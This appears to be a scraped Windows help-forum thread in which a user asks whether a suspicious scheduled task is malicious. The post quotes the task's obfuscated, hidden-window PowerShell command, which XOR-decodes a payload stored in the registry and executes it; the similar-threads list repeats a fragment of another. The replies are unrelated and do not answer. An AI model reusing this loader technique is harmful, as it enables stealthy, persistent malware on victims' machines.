Windows 10: Help identify suspicious tasks

Discus and support Help identify suspicious tasks in AntiVirus, Firewalls and System Security to solve the problem; i have noticed command prompt to appear and disappear instantly after 1-2 hours of startup then i checked my task scheduler and found this weird task... Discussion in 'AntiVirus, Firewalls and System Security' started by Jatinder Singh Ss, Jun 5, 2023.

1. Help identify suspicious tasks

i have noticed command prompt to appear and disappear instantly after 1-2 hours of startup then i checked my task scheduler and found this weird task named "t2PI3Rtb" which is tasked to run this script every 59 mins after user login location = \Microsoft\Windows\Management\Provisioning\t2Pi3script = /c EcHo iex "ICM [ScrIptblOck]::creaTE[sTRIng]::JOiN'', Get-itemPrOpeRty -pAth 'hklm:\sOftWaRE\dEFauLTuserenVIRoNmEntt2pI3r'.'t2PI3RtB' % { [cHAr]`$_ -BxoR 187 }" PowErsHELl -WInDOwstyLE hIDDeNanyone knows if it is harmful or not?

:)

Jatinder Singh Ss, Jun 5, 2023
  2. imanalien Win User

No restart button in task manager

another easy way to kill tasks, download and install Winaero Tweaker(free) and theres a setting to add a Kill non responding tasks using the desktop right click menu. When you place your cursor on the desktop anywhere and right click the option is at the top of the list, Very handy and you dont have to go through all those steps and well Winaero Tweaker has alot of cool Windows tweaks. Just posting a different suggestion, Im sure your ok with what was suggested here.

imanalien, Jun 5, 2023
  3. Brink Win User
    New AI task suggestions in Microsoft To Do web application

Source: https://techcommunity.microsoft.com/...o/ba-p/2052607

Brink, Jun 5, 2023
  4. Help identify suspicious tasks

help to remote connect

not sure how to use both programs u 2 suggested, i need more helpful steps thanks

Corduroy_Jr, Jun 5, 2023
Thema:

Help identify suspicious tasks

1. Help identify suspicious tasks - Similar Threads - Help identify suspicious

2. Suspicious task in task scheduler - Windows 11

in Windows 10 Gaming
    Suspicious task in task scheduler - Windows 11: I recently noticed a PowerShell window appearing on my desktop on Windows 11 insider preview 23545After some searching, it appeared to be related to a task in the scheduler. The name of the task seems odd and it is running something in PowerShell, however I do not know how to...
  3. Suspicious task in task scheduler - Windows 11

in Windows 10 Software and Apps
    Suspicious task in task scheduler - Windows 11: I recently noticed a PowerShell window appearing on my desktop on Windows 11 insider preview 23545After some searching, it appeared to be related to a task in the scheduler. The name of the task seems odd and it is running something in PowerShell, however I do not know how to...
  4. Help identify suspicious tasks

in Windows 10 Gaming
    Help identify suspicious tasks: i have noticed command prompt to appear and disappear instantly after 1-2 hours of startup then i checked my task scheduler and found this weird task named "t2PI3Rtb" which is tasked to run this script every 59 mins after user login location =...
  5. Help identify suspicious tasks

in Windows 10 Software and Apps
    Help identify suspicious tasks: i have noticed command prompt to appear and disappear instantly after 1-2 hours of startup then i checked my task scheduler and found this weird task named "t2PI3Rtb" which is tasked to run this script every 59 mins after user login location =...
  6. Help to identify suspicious task "jojLNs"

in AntiVirus, Firewalls and System Security
    Help to identify suspicious task "jojLNs": I had a somewhat suspicious task scheduled called "jojLNs" for some reason, it was tasked to run a powershell script in System32, the contents of which look something like this: $BeGAuVtuCJ=[ScriptBlock];$nXopPKHXZuvg=[string];$RFmkrqWtsy=[char]; icm...
  7. Found highly suspicious software in Task manager

Found highly suspicious software in Task manager: [IMG] So I'll start this off by saying I'm not entirely sure if this is exactly the correct place to post this however I failed to find an appropriate microsoft virus forum. So apologises if this is not the correct forum for this post. So I was searching through the...
  8. Suspicious activity in task manager

in Windows 10 Ask Insider
    Suspicious activity in task manager: Im not sure if im being paranoid but some services take up alot of cpu usage sometimes such as remote procedure call and wsappx, ive noticed apps that i didnt open being open in the task manager but i cant see them on screen. submitted by /u/ImNotAReptileISwear [link]...
  9. Suspicious task in task scheduler

Suspicious task in task scheduler: Recently I found a task in task scheduler that I didn't saw earlier, it named PostponeDeviceSetupToast_S-1-5-21-571410128-3262932422-3363705117-1000_0 and author is Microsoft Corporation, actions is Custom Handler. I don't know what it is and what it do and didn't found...
  10. Help identifying BSOD?

in Windows 10 BSOD Crashes and Debugging
    Help identifying BSOD?: I'm running Windows 10 and my 2 month old computer crashed a couple of times over the last few weeks while playing a video game (PUBG to be specific, and both crashes occurred on menu screen). I'd like to figure out the cause if at all possible. The dump file can be found...